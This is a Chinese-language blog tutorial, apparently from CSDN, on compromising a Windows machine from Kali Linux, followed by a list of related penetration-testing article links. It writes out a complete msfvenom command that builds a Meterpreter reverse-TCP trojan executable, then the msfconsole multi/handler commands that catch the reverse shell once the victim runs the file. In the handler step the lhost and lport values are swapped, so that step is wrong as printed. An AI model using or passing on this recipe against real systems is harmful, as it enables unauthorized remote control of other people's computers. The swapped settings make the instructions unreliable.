工具:一台带有kali linux系统的虚拟机,一个聪明的大脑

开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败

1.打开虚拟机,点击虚拟机

2.点击设置

3.点击网络适配器,看左边点击桥接模式,点击确定即可


好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?

1.打开虚拟机

2.打开终端,输入sudo su进入root用户权限

3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip

4.输入msfvenom -p windows/meterpreter/reverse_tcp lhost="本机ip" lport=5000 -f exe -o /root/payload.exe生成木马

显示以上信息表示生成成功,最后一行为木马路径,如果不是图片上的的显示信息,可能是写错了,检查一下

5.将木马程序从虚拟机中拖到靶机中

6.在终端中输入输入msfconsole

弹出以上信息表示打开成功

6.输入一下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 5000

set lport "本机ip"

然后输入exploit或者run开始远程监听

6.然后在靶机上双击打开木马exe程序,双以后可能靶机中没有任何的变化,但其实木马已经在运行并且已经在kali中反弹了shell,这表示我们已经成功的入侵了windows系统了

好啦,本期的教程就到这里了,大家在渗透的过程中有问题可以在下方留言,我会不定时的检查的哦

如何使用kali来入侵(渗透)一台windows相关推荐

  1. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

  2. 攻防世界 适合做桌面_网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战...

    课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali与编程,学习更多网络攻防干货! 一.背景介绍 在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如 ...

  3. 《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书

    内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具.本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者"杀链"采取的具体 ...

  4. 视频教程-Kali Linux 网络安全渗透测试-渗透测试

    Kali Linux 网络安全渗透测试 8年工作经验,精通C#,php,python编程语言. 张添翔 ¥179.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 APP ...

  5. Kali | MSF入侵Windows11

    Kali | MSF入侵Windows11 制作免杀木马 木马如何免杀 木马绕过免杀本质上还是更改他的特征码,那么总结一下可以有 编码 加壳免杀 二次编译 分离免杀:即将ShellCode和加载器分离 ...

  6. Linux kali内网渗透之ARP断网攻击

    Linux kali内网渗透之ARP断网攻击 ARP断网攻击 如果你的kali是虚拟机 ,请将其设置为网络桥接模式,这样才和内网在同一网段 如果你的kali里没有安装arpspoof,请在终端输入如下 ...

  7. Kali利用msf渗透Windows电脑(超详细)

    Kali利用msfvenom渗透Windows电脑 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执 ...

  8. Kali Linux Web 渗透测试— 第十二课-websploit

    Kali Linux Web 渗透测试- 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试- 第十二课-websploit..................... ...

  9. Kali Linux安全渗透教程1.1Linux安全渗透简介

    Kali Linux安全渗透教程1.1Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程.通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷.技术缺陷.本章将 ...

最新文章

  1. 独家|测量、建议、快速上手!你所使用的Python对象占用了多少内存?(附代码)...
  2. 求细胞数量pascal题解
  3. CSDN产品公告:APP新增大厂在线刷题功能、博主排名规则更新、MD编辑器优化
  4. hibernate更新部分字段的几种方法
  5. LinQ高级查询、组合查询
  6. python apscheduler一次只有一个job_Python使用APScheduler实现定时任务过程解析
  7. python网络爬虫基础day01
  8. Exchange2003的设定及安全管理
  9. truncate,delete,drop的异同点
  10. python 人工智能课程对孩子的好处_少儿编程有什么好处?儿童编程课程学习Python的4大原因...
  11. 关于12306的一点思考
  12. git常用命令让你几步摆脱图形工具提交项目
  13. c语言实验报告参考文献,c语言编程参考文献
  14. MYSQL的随机函数
  15. 17个好用免费的ftp软件工具推荐,支持中文
  16. 写好的python如何在其它电脑上运行_写人作文-写人作文300字-400字-500字
  17. 【思维模型】拥抱复杂性(第 1 部分)
  18. 树的最大连通分支问题
  19. 使用 GOLANG 发送邮件
  20. go语言socket编程

热门文章

  1. 2019科学突破奖揭晓 庄小威陈志坚许晨阳上榜
  2. 东北师范大学计算机学院官网6,东北师范大学计算机学院.doc
  3. linux蓝牙链接手机,在Linux操作系统下操作蓝牙手机的方法
  4. “直播五虎”二季度财报盘点:各有亮点,求增长是主旋律
  5. 【已阅】文件权限属性八进制表示法,chmod(文件权限属性更改),chown,chgrp指令,默认/实际起始权限与umask权限掩码关系,文件删除与粘滞位问题等
  6. 因子分析之ggplot2
  7. 带你了解数据结构与算法。附leetcode练习题
  8. 2009年下半年11月份信息系统项目管理师上午试题答案(分析与解答)(第5次修订 修订时间:2010年03月14日02时02分)
  9. 语言基因dyx1c1,DYX1C1基因1249G>T多态性与阅读障碍易感性关系的Meta分析.pdf
  10. 怎么样通过Nginx实现限流?